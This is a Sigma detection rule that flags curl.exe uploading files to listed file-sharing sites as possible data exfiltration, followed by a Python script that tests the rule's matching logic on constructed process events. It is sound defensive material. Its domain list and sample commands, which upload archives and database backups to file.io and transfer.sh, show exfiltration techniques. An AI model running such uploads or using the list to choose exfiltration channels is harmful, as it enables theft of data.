Curl File Upload To File Sharing Websites

Detects usage of curl to upload files to known file sharing domains, which may indicate data exfiltration.

Sigma rule

title: Curl File Upload To File Sharing Websites
id: e328cc73-f92a-42fb-b3fa-7c2cffda981a
related:
    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
      type: derived
    - id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
      type: similar
status: experimental
description: Detects usage of curl to upload files to known file sharing domains, which may indicate data exfiltration.
author: Swachchhanda Shrawan Poudel (Nextron Systems)
references:
    - https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
date: 2026-03-29
tags:
    - attack.exfiltration
    - attack.t1567.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\curl.exe'
        - OriginalFileName: 'curl.exe'
    selection_cli_domain:
        CommandLine|contains:
            - '0x0.st'
            - 'bashupload.com'
            - 'chunk.io'
            - 'file.io'
            - 'filebin.net'
            - 'pastebin'
            - 'send.firefox.com'
            - 'temp.sh'
            - 'transfer.sh'
            - 'ufile.io'
            - 'uploadfiles.io'
            - 'wetransfer.com'
            - 'x0.at'
    selection_cli_flags:
        - CommandLine|contains:
              - ' --form'
              - ' --upload-file'
              - ' --data'
              - ' -X POST'
              - ' --request POST '
        - CommandLine|re:
              - '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
              - '\s-sT\s'
    condition: all of selection_*
falsepositives:
    - Legitimate file uploads to these services by administrators or developers
level: high
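
Added example (not part of the rule or the original page): a Python evaluation of the rule's `condition: all of selection_*` over constructed process_creation events, showing how the three selections combine and why the `|re` branch is case sensitive. It assumes Sigma's default matching (case-insensitive `contains` and `endswith`, case-sensitive `re`); the sample events and the `intranet.example` host are constructed.

```python
import re

# Values copied from the rule's detection section.
DOMAINS = ['0x0.st', 'bashupload.com', 'chunk.io', 'file.io', 'filebin.net',
           'pastebin', 'send.firefox.com', 'temp.sh', 'transfer.sh',
           'ufile.io', 'uploadfiles.io', 'wetransfer.com', 'x0.at']
FLAG_SUBSTRINGS = [' --form', ' --upload-file', ' --data', ' -X POST',
                   ' --request POST ']
FLAG_REGEXES = [re.compile(r'\s-[FTd]\s'), re.compile(r'\s-sT\s')]


def contains_any(value, needles):
    """Sigma 'contains' with a list: case-insensitive substring, OR-ed."""
    low = value.lower()
    return any(n.lower() in low for n in needles)


def matches(event):
    """Evaluate 'all of selection_*' against one process_creation event."""
    image = event.get('Image', '')
    cmd = event.get('CommandLine', '')
    sel_img = (image.lower().endswith('\\curl.exe')
               or event.get('OriginalFileName', '').lower() == 'curl.exe')
    sel_domain = contains_any(cmd, DOMAINS)
    # The |re branch is case sensitive, so '-F' (form) differs from '-f' (fail).
    sel_flags = (contains_any(cmd, FLAG_SUBSTRINGS)
                 or any(rx.search(cmd) for rx in FLAG_REGEXES))
    return sel_img and sel_domain and sel_flags


# Constructed sample events (not real telemetry).
CURL = r'C:\Windows\System32\curl.exe'
SAMPLES = {
    'form_upload': {'Image': CURL, 'CommandLine': 'curl.exe -F file=@report.zip https://file.io'},
    'renamed_binary': {'Image': r'C:\Temp\c.exe', 'OriginalFileName': 'curl.exe',
                       'CommandLine': 'c.exe --upload-file db.bak https://transfer.sh/db.bak'},
    'download_only': {'Image': CURL, 'CommandLine': 'curl.exe -f -o out.txt https://temp.sh/abc/out.txt'},
    'other_domain': {'Image': CURL, 'CommandLine': 'curl.exe -F file=@a.txt https://intranet.example/upload'},
    'not_curl': {'Image': r'C:\Windows\System32\cmd.exe', 'CommandLine': 'cmd.exe /c echo -F file.io'},
}

def evaluate_samples():
    return {name: matches(ev) for name, ev in SAMPLES.items()}

if __name__ == '__main__':
    for name, hit in evaluate_samples().items():
        print(f'{name:15} {"MATCH" if hit else "no match"}')
```

The `download_only` event shows what the case-sensitive regex buys: a plain download from a listed domain with `-f` (fail on HTTP errors) does not raise the high-level alert, while `-F` (form upload) does.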
